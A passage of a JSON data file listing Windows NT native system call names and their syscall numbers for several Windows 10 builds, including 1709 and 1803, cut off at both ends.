\"NtRollbackComplete\": 368, \"NtRollbackEnlistment\": 369, \"NtRollbackRegistryTransaction\": 370, \"NtRollbackTransaction\": 371, \"NtRollforwardTransactionManager\": 372, \"NtSaveKey\": 373, \"NtSaveKeyEx\": 374, \"NtSaveMergedKeys\": 375, \"NtSecureConnectPort\": 376, \"NtSerializeBoot\": 377, \"NtSetBootEntryOrder\": 378, \"NtSetBootOptions\": 379, \"NtSetCachedSigningLevel\": 380, \"NtSetCachedSigningLevel2\": 381, \"NtSetContextThread\": 382, \"NtSetDebugFilterState\": 383, \"NtSetDefaultHardErrorPort\": 384, \"NtSetDefaultLocale\": 385, \"NtSetDefaultUILanguage\": 386, \"NtSetDriverEntryOrder\": 387, \"NtSetEaFile\": 388, \"NtSetHighEventPair\": 389, \"NtSetHighWaitLowEventPair\": 390, \"NtSetIRTimer\": 391, \"NtSetInformationDebugObject\": 392, \"NtSetInformationEnlistment\": 393, \"NtSetInformationJobObject\": 394, \"NtSetInformationKey\": 395, \"NtSetInformationResourceManager\": 396, \"NtSetInformationSymbolicLink\": 397, \"NtSetInformationToken\": 398, \"NtSetInformationTransaction\": 399, \"NtSetInformationTransactionManager\": 400, \"NtSetInformationVirtualMemory\": 401, \"NtSetInformationWorkerFactory\": 402, \"NtSetIntervalProfile\": 403, \"NtSetIoCompletion\": 404, \"NtSetIoCompletionEx\": 405, \"NtSetLdtEntries\": 406, \"NtSetLowEventPair\": 407, \"NtSetLowWaitHighEventPair\": 408, \"NtSetQuotaInformationFile\": 409, \"NtSetSecurityObject\": 410, \"NtSetSystemEnvironmentValue\": 411, \"NtSetSystemEnvironmentValueEx\": 412, \"NtSetSystemInformation\": 413, \"NtSetSystemPowerState\": 414, \"NtSetSystemTime\": 415, \"NtSetThreadExecutionState\": 416, \"NtSetTimer2\": 417, \"NtSetTimerEx\": 418, \"NtSetTimerResolution\": 419, \"NtSetUuidSeed\": 420, \"NtSetVolumeInformationFile\": 421, \"NtSetWnfProcessNotificationEvent\": 422, \"NtShutdownSystem\": 423, \"NtShutdownWorkerFactory\": 424, \"NtSignalAndWaitForSingleObject\": 425, \"NtSinglePhaseReject\": 426, \"NtStartProfile\": 427, \"NtStopProfile\": 428, \"NtSubscribeWnfStateChange\": 429, \"NtSuspendProcess\": 430, \"NtSuspendThread\": 431, \"NtSystemDebugControl\": 432, \"NtTerminateJobObject\": 433, \"NtTestAlert\": 434, \"NtThawRegistry\": 435, \"NtThawTransactions\": 436, \"NtTraceControl\": 437, \"NtTranslateFilePath\": 438, \"NtUmsThreadYield\": 439, \"NtUnloadDriver\": 440, \"NtUnloadKey\": 441, \"NtUnloadKey2\": 442, \"NtUnloadKeyEx\": 443, \"NtUnlockFile\": 444, \"NtUnlockVirtualMemory\": 445, \"NtUnmapViewOfSectionEx\": 446, \"NtUnsubscribeWnfStateChange\": 447, \"NtUpdateWnfStateData\": 448, \"NtVdmControl\": 449, \"NtWaitForAlertByThreadId\": 450, \"NtWaitForDebugEvent\": 451, \"NtWaitForKeyedEvent\": 452, \"NtWaitForWorkViaWorkerFactory\": 453, \"NtWaitHighEventPair\": 454, \"NtWaitLowEventPair\": 455}, \"1709\": {\"NtAccessCheck\": 0, \"NtWorkerFactoryWorkerReady\": 1, \"NtAcceptConnectPort\": 2, \"NtMapUserPhysicalPagesScatter\": 3, \"NtWaitForSingleObject\": 4, \"NtCallbackReturn\": 5, \"NtReadFile\": 6, \"NtDeviceIoControlFile\": 7, \"NtWriteFile\": 8, \"NtRemoveIoCompletion\": 9, \"NtReleaseSemaphore\": 10, \"NtReplyWaitReceivePort\": 11, \"NtReplyPort\": 12, \"NtSetInformationThread\": 13, \"NtSetEvent\": 14, \"NtClose\": 15, \"NtQueryObject\": 16, \"NtQueryInformationFile\": 17, \"NtOpenKey\": 18, \"NtEnumerateValueKey\": 19, \"NtFindAtom\": 20, \"NtQueryDefaultLocale\": 21, \"NtQueryKey\": 22, \"NtQueryValueKey\": 23, \"NtAllocateVirtualMemory\": 24, \"NtQueryInformationProcess\": 25, \"NtWaitForMultipleObjects32\": 26, \"NtWriteFileGather\": 27, \"NtSetInformationProcess\": 28, \"NtCreateKey\": 29, \"NtFreeVirtualMemory\": 30, \"NtImpersonateClientOfPort\": 31, \"NtReleaseMutant\": 32, \"NtQueryInformationToken\": 33, \"NtRequestWaitReplyPort\": 34, \"NtQueryVirtualMemory\": 35, \"NtOpenThreadToken\": 36, \"NtQueryInformationThread\": 37, \"NtOpenProcess\": 38, \"NtSetInformationFile\": 39, \"NtMapViewOfSection\": 40, \"NtAccessCheckAndAuditAlarm\": 41, \"NtUnmapViewOfSection\": 42, \"NtReplyWaitReceivePortEx\": 43, \"NtTerminateProcess\": 44, \"NtSetEventBoostPriority\": 45, \"NtReadFileScatter\": 46, \"NtOpenThreadTokenEx\": 47, \"NtOpenProcessTokenEx\": 48, \"NtQueryPerformanceCounter\": 49, \"NtEnumerateKey\": 50, \"NtOpenFile\": 51, \"NtDelayExecution\": 52, \"NtQueryDirectoryFile\": 53, \"NtQuerySystemInformation\": 54, \"NtOpenSection\": 55, \"NtQueryTimer\": 56, \"NtFsControlFile\": 57, \"NtWriteVirtualMemory\": 58, \"NtCloseObjectAuditAlarm\": 59, \"NtDuplicateObject\": 60, \"NtQueryAttributesFile\": 61, \"NtClearEvent\": 62, \"NtReadVirtualMemory\": 63, \"NtOpenEvent\": 64, \"NtAdjustPrivilegesToken\": 65, \"NtDuplicateToken\": 66, \"NtContinue\": 67, \"NtQueryDefaultUILanguage\": 68, \"NtQueueApcThread\": 69, \"NtYieldExecution\": 70, \"NtAddAtom\": 71, \"NtCreateEvent\": 72, \"NtQueryVolumeInformationFile\": 73, \"NtCreateSection\": 74, \"NtFlushBuffersFile\": 75, \"NtApphelpCacheControl\": 76, \"NtCreateProcessEx\": 77, \"NtCreateThread\": 78, \"NtIsProcessInJob\": 79, \"NtProtectVirtualMemory\": 80, \"NtQuerySection\": 81, \"NtResumeThread\": 82, \"NtTerminateThread\": 83, \"NtReadRequestData\": 84, \"NtCreateFile\": 85, \"NtQueryEvent\": 86, \"NtWriteRequestData\": 87, \"NtOpenDirectoryObject\": 88, \"NtAccessCheckByTypeAndAuditAlarm\": 89, \"NtQuerySystemTime\": 90, \"NtWaitForMultipleObjects\": 91, \"NtSetInformationObject\": 92, \"NtCancelIoFile\": 93, \"NtTraceEvent\": 94, \"NtPowerInformation\": 95, \"NtSetValueKey\": 96, \"NtCancelTimer\": 97, \"NtSetTimer\": 98, \"NtAccessCheckByType\": 99, \"NtAccessCheckByTypeResultList\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 101, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 102, \"NtAcquireProcessActivityReference\": 103, \"NtAddAtomEx\": 104, \"NtAddBootEntry\": 105, \"NtAddDriverEntry\": 106, \"NtAdjustGroupsToken\": 107, \"NtAdjustTokenClaimsAndDeviceGroups\": 108, \"NtAlertResumeThread\": 109, \"NtAlertThread\": 110, \"NtAlertThreadByThreadId\": 111, \"NtAllocateLocallyUniqueId\": 112, \"NtAllocateReserveObject\": 113, \"NtAllocateUserPhysicalPages\": 114, \"NtAllocateUuids\": 115, \"NtAlpcAcceptConnectPort\": 116, \"NtAlpcCancelMessage\": 117, \"NtAlpcConnectPort\": 118, \"NtAlpcConnectPortEx\": 119, \"NtAlpcCreatePort\": 120, \"NtAlpcCreatePortSection\": 121, \"NtAlpcCreateResourceReserve\": 122, \"NtAlpcCreateSectionView\": 123, \"NtAlpcCreateSecurityContext\": 124, \"NtAlpcDeletePortSection\": 125, \"NtAlpcDeleteResourceReserve\": 126, \"NtAlpcDeleteSectionView\": 127, \"NtAlpcDeleteSecurityContext\": 128, \"NtAlpcDisconnectPort\": 129, \"NtAlpcImpersonateClientContainerOfPort\": 130, \"NtAlpcImpersonateClientOfPort\": 131, \"NtAlpcOpenSenderProcess\": 132, \"NtAlpcOpenSenderThread\": 133, \"NtAlpcQueryInformation\": 134, \"NtAlpcQueryInformationMessage\": 135, \"NtAlpcRevokeSecurityContext\": 136, \"NtAlpcSendWaitReceivePort\": 137, \"NtAlpcSetInformation\": 138, \"NtAreMappedFilesTheSame\": 139, \"NtAssignProcessToJobObject\": 140, \"NtAssociateWaitCompletionPacket\": 141, \"NtCallEnclave\": 142, \"NtCancelIoFileEx\": 143, \"NtCancelSynchronousIoFile\": 144, \"NtCancelTimer2\": 145, \"NtCancelWaitCompletionPacket\": 146, \"NtCommitComplete\": 147, \"NtCommitEnlistment\": 148, \"NtCommitRegistryTransaction\": 149, \"NtCommitTransaction\": 150, \"NtCompactKeys\": 151, \"NtCompareObjects\": 152, \"NtCompareSigningLevels\": 153, \"NtCompareTokens\": 154, \"NtCompleteConnectPort\": 155, \"NtCompressKey\": 156, \"NtConnectPort\": 157, \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\": 158, \"NtCreateDebugObject\": 159, \"NtCreateDirectoryObject\": 160, \"NtCreateDirectoryObjectEx\": 161, \"NtCreateEnclave\": 162, \"NtCreateEnlistment\": 163, \"NtCreateEventPair\": 164, \"NtCreateIRTimer\": 165, \"NtCreateIoCompletion\": 166, \"NtCreateJobObject\": 167, \"NtCreateJobSet\": 168, \"NtCreateKeyTransacted\": 169, \"NtCreateKeyedEvent\": 170, \"NtCreateLowBoxToken\": 171, \"NtCreateMailslotFile\": 172, \"NtCreateMutant\": 173, \"NtCreateNamedPipeFile\": 174, \"NtCreatePagingFile\": 175, \"NtCreatePartition\": 176, \"NtCreatePort\": 177, \"NtCreatePrivateNamespace\": 178, \"NtCreateProcess\": 179, \"NtCreateProfile\": 180, \"NtCreateProfileEx\": 181, \"NtCreateRegistryTransaction\": 182, \"NtCreateResourceManager\": 183, \"NtCreateSemaphore\": 184, \"NtCreateSymbolicLinkObject\": 185, \"NtCreateThreadEx\": 186, \"NtCreateTimer\": 187, \"NtCreateTimer2\": 188, \"NtCreateToken\": 189, \"NtCreateTokenEx\": 190, \"NtCreateTransaction\": 191, \"NtCreateTransactionManager\": 192, \"NtCreateUserProcess\": 193, \"NtCreateWaitCompletionPacket\": 194, \"NtCreateWaitablePort\": 195, \"NtCreateWnfStateName\": 196, \"NtCreateWorkerFactory\": 197, \"NtDebugActiveProcess\": 198, \"NtDebugContinue\": 199, \"NtDeleteAtom\": 200, \"NtDeleteBootEntry\": 201, \"NtDeleteDriverEntry\": 202, \"NtDeleteFile\": 203, \"NtDeleteKey\": 204, \"NtDeleteObjectAuditAlarm\": 205, \"NtDeletePrivateNamespace\": 206, \"NtDeleteValueKey\": 207, \"NtDeleteWnfStateData\": 208, \"NtDeleteWnfStateName\": 209, \"NtDisableLastKnownGood\": 210, \"NtDisplayString\": 211, \"NtDrawText\": 212, \"NtEnableLastKnownGood\": 213, \"NtEnumerateBootEntries\": 214, \"NtEnumerateDriverEntries\": 215, \"NtEnumerateSystemEnvironmentValuesEx\": 216, \"NtEnumerateTransactionObject\": 217, \"NtExtendSection\": 218, \"NtFilterBootOption\": 219, \"NtFilterToken\": 220, \"NtFilterTokenEx\": 221, \"NtFlushBuffersFileEx\": 222, \"NtFlushInstallUILanguage\": 223, \"NtFlushInstructionCache\": 224, \"NtFlushKey\": 225, \"NtFlushProcessWriteBuffers\": 226, \"NtFlushVirtualMemory\": 227, \"NtFlushWriteBuffer\": 228, \"NtFreeUserPhysicalPages\": 229, \"NtFreezeRegistry\": 230, \"NtFreezeTransactions\": 231, \"NtGetCachedSigningLevel\": 232, \"NtGetCompleteWnfStateSubscription\": 233, \"NtGetContextThread\": 234, \"NtGetCurrentProcessorNumber\": 235, \"NtGetCurrentProcessorNumberEx\": 236, \"NtGetDevicePowerState\": 237, \"NtGetMUIRegistryInfo\": 238, \"NtGetNextProcess\": 239, \"NtGetNextThread\": 240, \"NtGetNlsSectionPtr\": 241, \"NtGetNotificationResourceManager\": 242, \"NtGetWriteWatch\": 243, \"NtImpersonateAnonymousToken\": 244, \"NtImpersonateThread\": 245, \"NtInitializeEnclave\": 246, \"NtInitializeNlsFiles\": 247, \"NtInitializeRegistry\": 248, \"NtInitiatePowerAction\": 249, \"NtIsSystemResumeAutomatic\": 250, \"NtIsUILanguageComitted\": 251, \"NtListenPort\": 252, \"NtLoadDriver\": 253, \"NtLoadEnclaveData\": 254, \"NtLoadHotPatch\": 255, \"NtLoadKey\": 256, \"NtLoadKey2\": 257, \"NtLoadKeyEx\": 258, \"NtLockFile\": 259, \"NtLockProductActivationKeys\": 260, \"NtLockRegistryKey\": 261, \"NtLockVirtualMemory\": 262, \"NtMakePermanentObject\": 263, \"NtMakeTemporaryObject\": 264, \"NtManagePartition\": 265, \"NtMapCMFModule\": 266, \"NtMapUserPhysicalPages\": 267, \"NtModifyBootEntry\": 268, \"NtModifyDriverEntry\": 269, \"NtNotifyChangeDirectoryFile\": 270, \"NtNotifyChangeDirectoryFileEx\": 271, \"NtNotifyChangeKey\": 272, \"NtNotifyChangeMultipleKeys\": 273, \"NtNotifyChangeSession\": 274, \"NtOpenEnlistment\": 275, \"NtOpenEventPair\": 276, \"NtOpenIoCompletion\": 277, \"NtOpenJobObject\": 278, \"NtOpenKeyEx\": 279, \"NtOpenKeyTransacted\": 280, \"NtOpenKeyTransactedEx\": 281, \"NtOpenKeyedEvent\": 282, \"NtOpenMutant\": 283, \"NtOpenObjectAuditAlarm\": 284, \"NtOpenPartition\": 285, \"NtOpenPrivateNamespace\": 286, \"NtOpenProcessToken\": 287, \"NtOpenRegistryTransaction\": 288, \"NtOpenResourceManager\": 289, \"NtOpenSemaphore\": 290, \"NtOpenSession\": 291, \"NtOpenSymbolicLinkObject\": 292, \"NtOpenThread\": 293, \"NtOpenTimer\": 294, \"NtOpenTransaction\": 295, \"NtOpenTransactionManager\": 296, \"NtPlugPlayControl\": 297, \"NtPrePrepareComplete\": 298, \"NtPrePrepareEnlistment\": 299, \"NtPrepareComplete\": 300, \"NtPrepareEnlistment\": 301, \"NtPrivilegeCheck\": 302, \"NtPrivilegeObjectAuditAlarm\": 303, \"NtPrivilegedServiceAuditAlarm\": 304, \"NtPropagationComplete\": 305, \"NtPropagationFailed\": 306, \"NtPulseEvent\": 307, \"NtQueryAuxiliaryCounterFrequency\": 308, \"NtQueryBootEntryOrder\": 309, \"NtQueryBootOptions\": 310, \"NtQueryDebugFilterState\": 311, \"NtQueryDirectoryFileEx\": 312, \"NtQueryDirectoryObject\": 313, \"NtQueryDriverEntryOrder\": 314, \"NtQueryEaFile\": 315, \"NtQueryFullAttributesFile\": 316, \"NtQueryInformationAtom\": 317, \"NtQueryInformationByName\": 318, \"NtQueryInformationEnlistment\": 319, \"NtQueryInformationJobObject\": 320, \"NtQueryInformationPort\": 321, \"NtQueryInformationResourceManager\": 322, \"NtQueryInformationTransaction\": 323, \"NtQueryInformationTransactionManager\": 324, \"NtQueryInformationWorkerFactory\": 325, \"NtQueryInstallUILanguage\": 326, \"NtQueryIntervalProfile\": 327, \"NtQueryIoCompletion\": 328, \"NtQueryLicenseValue\": 329, \"NtQueryMultipleValueKey\": 330, \"NtQueryMutant\": 331, \"NtQueryOpenSubKeys\": 332, \"NtQueryOpenSubKeysEx\": 333, \"NtQueryPortInformationProcess\": 334, \"NtQueryQuotaInformationFile\": 335, \"NtQuerySecurityAttributesToken\": 336, \"NtQuerySecurityObject\": 337, \"NtQuerySecurityPolicy\": 338, \"NtQuerySemaphore\": 339, \"NtQuerySymbolicLinkObject\": 340, \"NtQuerySystemEnvironmentValue\": 341, \"NtQuerySystemEnvironmentValueEx\": 342, \"NtQuerySystemInformationEx\": 343, \"NtQueryTimerResolution\": 344, \"NtQueryWnfStateData\": 345, \"NtQueryWnfStateNameInformation\": 346, \"NtQueueApcThreadEx\": 347, \"NtRaiseException\": 348, \"NtRaiseHardError\": 349, \"NtReadOnlyEnlistment\": 350, \"NtRecoverEnlistment\": 351, \"NtRecoverResourceManager\": 352, \"NtRecoverTransactionManager\": 353, \"NtRegisterProtocolAddressInformation\": 354, \"NtRegisterThreadTerminatePort\": 355, \"NtReleaseKeyedEvent\": 356, \"NtReleaseWorkerFactoryWorker\": 357, \"NtRemoveIoCompletionEx\": 358, \"NtRemoveProcessDebug\": 359, \"NtRenameKey\": 360, \"NtRenameTransactionManager\": 361, \"NtReplaceKey\": 362, \"NtReplacePartitionUnit\": 363, \"NtReplyWaitReplyPort\": 364, \"NtRequestPort\": 365, \"NtResetEvent\": 366, \"NtResetWriteWatch\": 367, \"NtRestoreKey\": 368, \"NtResumeProcess\": 369, \"NtRevertContainerImpersonation\": 370, \"NtRollbackComplete\": 371, \"NtRollbackEnlistment\": 372, \"NtRollbackRegistryTransaction\": 373, \"NtRollbackTransaction\": 374, \"NtRollforwardTransactionManager\": 375, \"NtSaveKey\": 376, \"NtSaveKeyEx\": 377, \"NtSaveMergedKeys\": 378, \"NtSecureConnectPort\": 379, \"NtSerializeBoot\": 380, \"NtSetBootEntryOrder\": 381, \"NtSetBootOptions\": 382, \"NtSetCachedSigningLevel\": 383, \"NtSetCachedSigningLevel2\": 384, \"NtSetContextThread\": 385, \"NtSetDebugFilterState\": 386, \"NtSetDefaultHardErrorPort\": 387, \"NtSetDefaultLocale\": 388, \"NtSetDefaultUILanguage\": 389, \"NtSetDriverEntryOrder\": 390, \"NtSetEaFile\": 391, \"NtSetHighEventPair\": 392, \"NtSetHighWaitLowEventPair\": 393, \"NtSetIRTimer\": 394, \"NtSetInformationDebugObject\": 395, \"NtSetInformationEnlistment\": 396, \"NtSetInformationJobObject\": 397, \"NtSetInformationKey\": 398, \"NtSetInformationResourceManager\": 399, \"NtSetInformationSymbolicLink\": 400, \"NtSetInformationToken\": 401, \"NtSetInformationTransaction\": 402, \"NtSetInformationTransactionManager\": 403, \"NtSetInformationVirtualMemory\": 404, \"NtSetInformationWorkerFactory\": 405, \"NtSetIntervalProfile\": 406, \"NtSetIoCompletion\": 407, \"NtSetIoCompletionEx\": 408, \"NtSetLdtEntries\": 409, \"NtSetLowEventPair\": 410, \"NtSetLowWaitHighEventPair\": 411, \"NtSetQuotaInformationFile\": 412, \"NtSetSecurityObject\": 413, \"NtSetSystemEnvironmentValue\": 414, \"NtSetSystemEnvironmentValueEx\": 415, \"NtSetSystemInformation\": 416, \"NtSetSystemPowerState\": 417, \"NtSetSystemTime\": 418, \"NtSetThreadExecutionState\": 419, \"NtSetTimer2\": 420, \"NtSetTimerEx\": 421, \"NtSetTimerResolution\": 422, \"NtSetUuidSeed\": 423, \"NtSetVolumeInformationFile\": 424, \"NtSetWnfProcessNotificationEvent\": 425, \"NtShutdownSystem\": 426, \"NtShutdownWorkerFactory\": 427, \"NtSignalAndWaitForSingleObject\": 428, \"NtSinglePhaseReject\": 429, \"NtStartProfile\": 430, \"NtStopProfile\": 431, \"NtSubscribeWnfStateChange\": 432, \"NtSuspendProcess\": 433, \"NtSuspendThread\": 434, \"NtSystemDebugControl\": 435, \"NtTerminateEnclave\": 436, \"NtTerminateJobObject\": 437, \"NtTestAlert\": 438, \"NtThawRegistry\": 439, \"NtThawTransactions\": 440, \"NtTraceControl\": 441, \"NtTranslateFilePath\": 442, \"NtUmsThreadYield\": 443, \"NtUnloadDriver\": 444, \"NtUnloadKey\": 445, \"NtUnloadKey2\": 446, \"NtUnloadKeyEx\": 447, \"NtUnlockFile\": 448, \"NtUnlockVirtualMemory\": 449, \"NtUnmapViewOfSectionEx\": 450, \"NtUnsubscribeWnfStateChange\": 451, \"NtUpdateWnfStateData\": 452, \"NtVdmControl\": 453, \"NtWaitForAlertByThreadId\": 454, \"NtWaitForDebugEvent\": 455, \"NtWaitForKeyedEvent\": 456, \"NtWaitForWorkViaWorkerFactory\": 457, \"NtWaitHighEventPair\": 458, \"NtWaitLowEventPair\": 459}, \"1803\": {\"NtAccessCheck\": 0, \"NtWorkerFactoryWorkerReady\": 1, \"NtAcceptConnectPort\": 2, \"NtMapUserPhysicalPagesScatter\": 3, \"NtWaitForSingleObject\": 4, \"NtCallbackReturn\": 5, \"NtReadFile\": 6, \"NtDeviceIoControlFile\": 7, \"NtWriteFile\": 8, \"NtRemoveIoCompletion\": 9, \"NtReleaseSemaphore\": 10, \"NtReplyWaitReceivePort\": 11, \"NtReplyPort\": 12, \"NtSetInformationThread\": 13, \"NtSetEvent\": 14, \"NtClose\": 15, \"NtQueryObject\": 16, \"NtQueryInformationFile\": 17, \"NtOpenKey\": 18, \"NtEnumerateValueKey\": 19, \"NtFindAtom\": 20, \"NtQueryDefaultLocale\": 21, \"NtQueryKey\": 22, \"NtQueryValueKey\": 23, \"NtAllocateVirtualMemory\": 24, \"NtQueryInformationProcess\": 25, \"NtWaitForMultipleObjects32\": 26, \"NtWriteFileGather\": 27, \"NtSetInformationProcess\": 28, \"NtCreateKey\": 29, \"NtFreeVirtualMemory\": 30, \"NtImpersonateClientOfPort\": 31, \"NtReleaseMutant\": 32, \"NtQueryInformationToken\": 33, \"NtRequestWaitReplyPort\": 34, \"NtQueryVirtualMemory\": 35, \"NtOpenThreadToken\": 36, \"NtQueryInformationThread\": 37, \"NtOpenProcess\": 38, \"NtSetInformationFile\": 39, \"NtMapViewOfSection\": 40, \"NtAccessCheckAndAuditAlarm\": 41, \"NtUnmapViewOfSection\": 42, \"NtReplyWaitReceivePortEx\": 43, \"NtTerminateProcess\": 44, \"NtSetEventBoostPriority\": 45, \"NtReadFileScatter\": 46, \"NtOpenThreadTokenEx\": 47, \"NtOpenProcessTokenEx\": 48, \"NtQueryPerformanceCounter\": 49, \"NtEnumerateKey\": 50, \"NtOpenFile\": 51, \"NtDelayExecution\": 52, \"NtQueryDirectoryFile\": 53, \"NtQuerySystemInformation\": 54, \"NtOpenSection\": 55, \"NtQueryTimer\": 56, \"NtFsControlFile\": 57, \"NtWriteVirtualMemory\": 58, \"NtCloseObjectAuditAlarm\": 59, \"NtDuplicateObject\": 60, \"NtQueryAttributesFile\": 61, \"NtClearEvent\": 62, \"NtReadVirtualMemory\": 63, \"NtOpenEvent\": 64, \"NtAdjustPrivilegesToken\": 65, \"NtDuplicateToken\": 66, \"NtContinue\": 67, \"NtQueryDefaultUILanguage\": 68, \"NtQueueApcThread\": 69, \"NtYieldExecution\": 70, \"NtAddAtom\": 71, \"NtCreateEvent\": 72, \"NtQueryVolumeInformationFile\": 73, \"NtCreateSection\": 74, \"NtFlushBuffersFile\": 75, \"NtApphelpCacheControl\": 76, \"NtCreateProcessEx\": 77, \"NtCreateThread\": 78, \"NtIsProcessInJob\": 79, \"NtProtectVirtualMemory\": 80, \"NtQuerySection\": 81, \"NtResumeThread\": 82, \"NtTerminateThread\": 83, \"NtReadRequestData\": 84, \"NtCreateFile\": 85, \"NtQueryEvent\": 86, \"NtWriteRequestData\": 87, \"NtOpenDirectoryObject\": 88, \"NtAccessCheckByTypeAndAuditAlarm\": 89, \"NtQuerySystemTime\": 90, \"NtWaitForMultipleObjects\": 91, \"NtSetInformationObject\": 92, \"NtCancelIoFile\": 93, \"NtTraceEvent\": 94, \"NtPowerInformation\": 95, \"NtSetValueKey\": 96, \"NtCancelTimer\": 97, \"NtSetTimer\": 98, \"NtAccessCheckByType\": 99, \"NtAccessCheckByTypeResultList\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 101, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 102, \"NtAcquireProcessActivityReference\": 103, \"NtAddAtomEx\": 104, \"NtAddBootEntry\": 105, \"NtAddDriverEntry\": 106, \"NtAdjustGroupsToken\": 107, \"NtAdjustTokenClaimsAndDeviceGroups\": 108, \"NtAlertResumeThread\": 109, \"NtAlertThread\": 110, \"NtAlertThreadByThreadId\": 111, \"NtAllocateLocallyUniqueId\": 112, \"NtAllocateReserveObject\": 113, \"NtAllocateUserPhysicalPages\": 114, \"NtAllocateUuids\": 115, \"NtAllocateVirtualMemoryEx\": 116, \"NtAlpcAcceptConnectPort\": 117, \"NtAlpcCancelMessage\": 118, \"NtAlpcConnectPort\": 119, \"NtAlpcConnectPortEx\": 120, \"NtAlpcCreatePort\": 121, \"NtAlpcCreatePortSection\": 122, \"NtAlpcCreateResourceReserve\": 123, \"NtAlpcCreateSectionView\": 124, \"NtAlpcCreateSecurityContext\": 125, \"NtAlpcDeletePortSection\": 126, \"NtAlpcDeleteResourceReserve\": 127, \"NtAlpcDeleteSectionView\": 128, \"NtAlpcDeleteSecurityContext\": 129, \"NtAlpcDisconnectPort\": 130, \"NtAlpcImpersonateClientContainerOfPort\": 131, \"NtAlpcImpersonateClientOfPort\": 132, \"NtAlpcOpenSenderProcess\": 133, \"NtAlpcOpenSenderThread\": 134, \"NtAlpcQueryInformation\": 135, \"NtAlpcQueryInformationMessage\": 136, \"NtAlpcRevokeSecurityContext\": 137, \"NtAlpcSendWaitReceivePort\": 138, \"NtAlpcSetInformation\": 139, \"NtAreMappedFilesTheSame\": 140, \"NtAssignProcessToJobObject\": 141, \"NtAssociateWaitCompletionPacket\": 142, \"NtCallEnclave\": 143, \"NtCancelIoFileEx\": 144, \"NtCancelSynchronousIoFile\": 145, \"NtCancelTimer2\": 146, \"NtCancelWaitCompletionPacket\": 147, \"NtCommitComplete\": 148, \"NtCommitEnlistment\": 149, \"NtCommitRegistryTransaction\": 150, \"NtCommitTransaction\": 151, \"NtCompactKeys\": 152, \"NtCompareObjects\": 153, \"NtCompareSigningLevels\": 154, \"NtCompareTokens\": 155, \"NtCompleteConnectPort\": 156, \"NtCompressKey\": 157, \"NtConnectPort\": 158, \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\": 159, \"NtCreateDebugObject\": 160, \"NtCreateDirectoryObject\": 161, \"NtCreateDirectoryObjectEx\": 162, \"NtCreateEnclave\": 163, \"NtCreateEnlistment\": 164, \"NtCreateEventPair\": 165, \"NtCreateIRTimer\": 166, \"NtCreateIoCompletion\": 167, \"NtCreateJobObject\": 168, \"NtCreateJobSet\": 169, \"NtCreateKeyTransacted\": 170, \"NtCreateKeyedEvent\": 171, \"NtCreateLowBoxToken\": 172, \"NtCreateMailslotFile\": 173, \"NtCreateMutant\": 174, \"NtCreateNamedPipeFile\": 175, \"NtCreatePagingFile\": 176, \"NtCreatePartition\": 177, \"NtCreatePort\": 178, \"NtCreatePrivateNamespace\": 179, \"NtCreateProcess\": 180, \"NtCreateProfile\": 181, \"NtCreateProfileEx\": 182, \"NtCreateRegistryTransaction\": 183, \"NtCreateResourceManager\": 184, \"NtCreateSemaphore\": 185, \"NtCreateSymbolicLinkObject\": 186, \"NtCreateThreadEx\": 187, \"NtCreateTimer\": 188, \"NtCreateTimer2\": 189, \"NtCreateToken\": 190, \"NtCreateTokenEx\": 191, \"NtCreateTransaction\": 192, \"NtCreateTransactionManager\": 193, \"NtCreateUserProcess\": 194, \"NtCreateWaitCompletionPacket\": 195, \"NtCreateWaitablePort\": 196, \"NtCreateWnfStateName\": 197, \"NtCreateWorkerFactory\": 198, \"NtDebugActiveProcess\": 199, \"NtDebugContinue\": 200, \"NtDeleteAtom\": 201, \"NtDeleteBootEntry\": 202, \"NtDeleteDriverEntry\": 203, \"NtDeleteFile\": 204, \"NtDeleteKey\": 205, \"NtDeleteObjectAuditAlarm\": 206, \"NtDeletePrivateNamespace\": 207, \"NtDeleteValueKey\": 208, \"NtDeleteWnfStateData\": 209, \"NtDeleteWnfStateName\": 210, \"NtDisableLastKnownGood\": 211, \"NtDisplayString\": 212, \"NtDrawText\": 213, \"NtEnableLastKnownGood\": 214, \"NtEnumerateBootEntries\": 215, \"NtEnumerateDriverEntries\": 216, \"NtEnumerateSystemEnvironmentValuesEx\": 217, \"NtEnumerateTransactionObject\": 218, \"NtExtendSection\": 219, \"NtFilterBootOption\": 220, \"NtFilterToken\": 221, \"NtFilterTokenEx\": 222, \"NtFlushBuffersFileEx\": 223, \"NtFlushInstallUILanguage\": 224, \"NtFlushInstructionCache\": 225, \"NtFlushKey\": 226, \"NtFlushProcessWriteBuffers\": 227, \"NtFlushVirtualMemory\": 228, \"NtFlushWriteBuffer\": 229, \"NtFreeUserPhysicalPages\": 230, \"NtFreezeRegistry\": 231, \"NtFreezeTransactions\": 232, \"NtGetCachedSigningLevel\": 233, \"NtGetCompleteWnfStateSubscription\": 234, \"NtGetContextThread\": 235, \"NtGetCurrentProcessorNumber\": 236, \"NtGetCurrentProcessorNumberEx\": 237, \"NtGetDevicePowerState\": 238, \"NtGetMUIRegistryInfo\": 239, \"NtGetNextProcess\": 240, \"NtGetNextThread\": 241, \"NtGetNlsSectionPtr\": 242, \"NtGetNotificationResourceManager\": 243, \"NtGetWriteWatch\": 244, \"NtImpersonateAnonymousToken\": 245, \"NtImpersonateThread\": 246, \"NtInitializeEnclave\": 247, \"NtInitializeNlsFiles\": 248, \"NtInitializeRegistry\": 249, \"NtInitiatePowerAction\": 250, \"NtIsSystemResumeAutomatic\": 251, \"NtIsUILanguageComitted\": 252, \"NtListenPort\": 253, \"NtLoadDriver\": 254, \"NtLoadEnclaveData\": 255, \"NtLoadHotPatch\": 256, \"NtLoadKey\": 257, \"NtLoadKey2\": 258, \"NtLoadKeyEx\": 259, \"NtLockFile\": 260, \"NtLockProductActivationKeys\": 261, \"NtLockRegistryKey\": 262, \"NtLockVirtualMemory\": 263, \"NtMakePermanentObject\": 264, \"NtMakeTemporaryObject\": 265, \"NtManagePartition\": 266, \"NtMapCMFModule\": 267, \"NtMapUserPhysicalPages\": 268, \"NtMapViewOfSectionEx\": 269, \"NtModifyBootEntry\": 270, \"NtModifyDriverEntry\": 271, \"NtNotifyChangeDirectoryFile\": 272, \"NtNotifyChangeDirectoryFileEx\": 273, \"NtNotifyChangeKey\": 274, \"NtNotifyChangeMultipleKeys\": 275, \"NtNotifyChangeSession\": 276, 